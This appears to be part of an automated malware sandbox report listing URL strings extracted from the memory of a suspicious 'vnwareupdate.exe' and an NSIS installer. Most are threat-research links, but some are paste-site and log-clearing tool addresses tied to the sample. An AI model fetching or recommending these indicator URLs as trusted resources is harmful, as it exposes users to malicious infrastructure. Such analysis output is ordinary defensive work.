Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/01/index.htmlKaragany.B
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index3.html
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index3.htmlGlobeImposter
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index3.htmlTomcat
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index3.htmlVawtrak
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index4.html
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index4.htmlAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index4.htmlDridex
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index4.htmlGryphon
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/02/index4.htmlxCaon
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/03/index.htmlIntroducing
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/03/index.htmlx
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html?m=1
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlNebula
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlRegin
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlUrsnif:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://marcoramilli.blogspot.co.uk/2017/06/false-flag-attack-on-multi-stage.html.
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://marcoramilli.blogspot.co.uk/2017/06/false-flag-attack-on-multi-stage.htmlFalse
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://md5.com.cn/index.php/md5reverse/index/md/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://microsoftcompanywork.htm
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-mor
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morBernhardPOS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morMultiple
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://mymalwareparty.blogspot.co.uk/2018/01/word-add-in-persistence-found-in-wi
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://mymalwareparty.blogspot.co.uk/2018/01/word-add-in-persistence-found-in-wi9Word
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://mymalwareparty.blogspot.co.uk/2018/01/word-add-in-persistence-found-in-wiCobalt
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://mymalwareparty.blogspot.co.uk/2018/01/word-add-in-persistence-found-in-wiOkiru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://mymalwareparty.blogspot.co.uk/2018/01/word-add-in-persistence-found-in-wiWord
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-exce
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://netimo.net
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: http://news.asiaone.com/news
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=11115&c=5&lng=en&p=0
Source: vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=11115&ampAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=11115&ampLinux.DDoS.93
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5Duqu
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5Lazarus
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5New
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5Operation
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9548&lng=en&c=5Trojanized
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: http://news.drweb.com/show/?i=9754&lng=en&c=14
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-theAlphaLocker
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://news.softpedia.com/news/meet-orcus-latest-addition-to-the-rat-market-5060
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://news.softpedia.com/news/new-malware-uses
Source: GZe6EcSTpO.exe, GZe6EcSTpO.exe, 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: GZe6EcSTpO.exe, 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://ntsecurity.nu/toolbox/clearlogs/
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://oalabs.openanalysis.net/2016/09/18/the-case-of-getlook23-using-github-iss
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://pages.arbornetworks.com/rs/082-KNA-087/images/ASERT%20Threat%20Intelligen
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/Palebot_Pales
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/Palebot_PalesOperation
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20a
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20a8
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20aHangover
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20actHangover
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20ailHangover
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20ailPitty
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20araHangover
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20areHangover
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20aybHangover
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/FTA%201001%20
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/FTA%201001%20Illuminating
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/FTA%201001%20New
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/FTA%201001%20Updated
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/ThreatConnect
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7V
Source: vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7VAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7VLinux.DDoS.93
Source: vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7VSpy
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7VfAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/it1xSB7VfSpy
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/S8ApwFFz
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/S8ApwFFzGathering
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/S8ApwFFziAkdoor
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.c
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.cMacro
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.cWonknu:
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-.
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-Attack
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-Bolek:
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/disrupting-an-adware-serving-skype-botnet/
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/disrupting-an-adware-serving-skype-botnet/Disrupting
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/disrupting-an-adware-serving-skype-botnet/Pushdo
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/fluxerbot-nginx-powered-proxy-malware/
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/macro-documents-with-xor-encoded-payloads/
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://phishme.com/rockloader-new-upatre-like-downloader-pushed-dridex-downloads
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.ht
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.htNewPosThings
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.htOrcaRAT
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/12/festive-spearphishing-merry-
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/12/festive-spearphishing-merry-BAIJIU:
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/12/festive-spearphishing-merry-Holiday
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2014/12/festive-spearphishing-merry-The
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/neutrino-exploit-kit-deliver
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.htmlFMore
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.htmleaMore
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.htmlrPlugX
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.htmltMore
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.htmlwMore
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/cyber_security_updates/2016/05/exploring-cve-2015-2545-and-
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/files/cto-tib-20150223-01a.pdf
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/files/cto-tib-20150223-01a.pdfAPT30
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/files/cto-tib-20150223-01a.pdfSakula
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://pwc.blogs.com/files/cto-tib-20150223-01a.pdfScanbox
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2014/12/compromised-wordpress-sites-serving.html?utm
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2014/12/compromised-wordpress-sites-serving.html?utmCompromised
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2014/12/compromised-wordpress-sites-serving.html?utmOilRig
Source: vnwareupdate.exe, 00000003.00000003.244930410.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2015/06/gamarue-dropping-lethic-bot.html?utm_source=
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2015/06/gamarue-dropping-lethic-bot.html?utm_source=Malware
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2015/12/new-spy-banker-trojan-telax-abusing.html
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.html
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.html.pThere
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlPost-Soviet
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlTThere
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlThere
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlaThere
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlack
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlgThere
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmluThere
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.co
Source: vnwareupdate.exe, 00000003.00000003.242241721.0000000003CA7000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/08/attacks-east-asia-using-googl
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/08/attacks-east-asia-using-googlAttacks
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/08/attacks-east-asia-using-googlBadMirror:
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/08/attacks-east-asia-using-googlDCSO
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/08/attacks-east-asia-using-googlWild
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-Recent
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-aRecent
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-f6Recent
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-ioRecent
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-udiRecent
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2014/10/new-indicators-compromise-apt
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-e
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-e8
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-eCmstar
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-eThe
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/plugx-uses-legitimate-samsung
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/plugx-uses-legitimate-samsungMagnitude
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/05/plugx-uses-legitimate-samsungPlugX
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-fam
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/apt-group-ups-targets-us-gove
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/apt-group-ups-targets-us-goveChina-based
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/tracking-minidionis-cozycars-
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/tracking-minidionis-cozycars-CozyCar
